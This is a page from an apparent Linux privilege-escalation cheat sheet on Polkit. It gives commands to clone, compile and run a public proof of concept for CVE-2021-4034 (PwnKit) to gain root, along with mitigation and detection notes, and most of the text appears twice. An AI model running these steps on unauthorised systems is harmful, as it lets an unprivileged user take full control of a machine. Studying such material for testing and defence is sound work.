23.Polkit

Run command as root using pkexec

pkexec -u root id
pkexec -u root /bin/bash # or /bin/sh

Check if a process is authorized for an action

pkcheck --process <pid> --action-id <action_id> --allow-user-defaults

List available actions

pkaction

Example of using pkexec to run a command as another user.

pkexec --user <username> <command>

Clone exploit

git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034

Compile exploit

gcc cve-2021-4034-poc.c -o poc

Run exploit

./poc

Verify root access

id
whoami

Key Concepts:

Polkit (PolicyKit):
- Authorization service for Linux systems.
- Controls permissions for user software and system components.
pkexec:
- A Polkit tool that allows running commands as another user (including root).
- The vulnerable component.
CVE-2021-4034 (PwnKit):
- Memory corruption vulnerability in pkexec.
- Allows unprivileged users to gain root privileges.

Vulnerability and Exploitation:

Vulnerability Details:
- The vulnerability is a memory corruption issue.
- It allows an attacker to manipulate the execution flow of pkexec.
Exploitation Process:
- Download a Proof-of-Concept (PoC) exploit.
- Compile the exploit.
- Run the exploit.
- The exploit grants a root shell.
Mitigation:
- Update Polkit to a patched version.

Exploitation Steps (as described):

Download PoC Exploit:
- git clone https://github.com/arthepsy/CVE-2021-4034.git
- cd CVE-2021-4034
Compile Exploit:
- gcc cve-2021-4034-poc.c -o poc
Run Exploit:
- ./poc
Verify Root Access:
- id

Important Considerations and Enhancements:

Vulnerability Severity:
- PwnKit is a critical vulnerability.
- It allows trivial privilege escalation.
Patching:
- Updating Polkit is essential.
Exploit Reliability:
- The PoC exploit is generally reliable.
Detection:
- Monitor for unexpected pkexec usage.
- Use intrusion detection systems.
Real world examples: Researching real world polkit exploits will help solidify understanding of the attack vectors.
Polkit Rules: More information about how polkit rules function, and how they can be missconfigured would be useful.
Polkit actions: More information about how polkit actions function would be useful.

Previous22.Sudo Next24.Dirty-pipe

Last updated 12 days ago

Verify root access

id
whoami

Key Concepts:

Polkit (PolicyKit):

Authorization service for Linux systems.
Controls permissions for user software and system components.

pkexec:

A Polkit tool that allows running commands as another user (including root).
The vulnerable component.

CVE-2021-4034 (PwnKit):

Memory corruption vulnerability in pkexec.
Allows unprivileged users to gain root privileges.

Vulnerability and Exploitation:

Vulnerability Details:

The vulnerability is a memory corruption issue.
It allows an attacker to manipulate the execution flow of pkexec.

Exploitation Process:

Download a Proof-of-Concept (PoC) exploit.
Compile the exploit.
Run the exploit.
The exploit grants a root shell.

Mitigation:

Update Polkit to a patched version.

Exploitation Steps (as described):

Download PoC Exploit:

git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034

Compile Exploit:

gcc cve-2021-4034-poc.c -o poc

Run Exploit:

./poc

Verify Root Access:

id

Important Considerations and Enhancements:

Vulnerability Severity:

PwnKit is a critical vulnerability.
It allows trivial privilege escalation.

Patching:

Updating Polkit is essential.

Exploit Reliability:

The PoC exploit is generally reliable.

Detection:

Monitor for unexpected pkexec usage.
Use intrusion detection systems.

Real world examples: Researching real world polkit exploits will help solidify understanding of the attack vectors.

Polkit Rules: More information about how polkit rules function, and how they can be missconfigured would be useful.

Polkit actions: More information about how polkit actions function would be useful.